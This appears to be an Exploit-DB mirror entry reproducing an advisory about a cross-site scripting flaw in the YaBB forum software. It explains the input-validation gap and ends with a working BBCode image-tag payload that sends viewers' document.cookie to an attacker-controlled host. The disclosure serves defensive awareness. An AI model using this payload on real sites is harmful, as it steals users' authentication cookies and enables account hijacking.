exploit-db-mirror/exploits/cgi/webapps/21208.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

13 lines
No EOL
923 B
Text

source: https://www.securityfocus.com/bid/3828/info
YaBB (Yet Another Bulletin Board) is freely available web forums/community software that is written in Perl. YaBB will run on most Unix/Linux variants, MacOS, and Microsoft Windows 9x/ME/NT/2000/XP platforms.
YaBB is prone to cross-agent scripting attacks via the insertion of HTML tags into image links in messages. Due to insufficient input validation, it is possible to insert arbitrary script code in forum messages/replies. The malicious script code will be executed in the browser of the user viewing the message, in the context of the site running YaBB.
This makes it possible for a malicious user to post a message which is capable of stealing another legitimate user's cookie-based authentication credentials.
[img]javascript:document.write
('&#x3cimg
src=http://attackerssite/tools/cookie.plx?cookie='+escape(docu
ment.cookie)+'&#x3e')
[/img]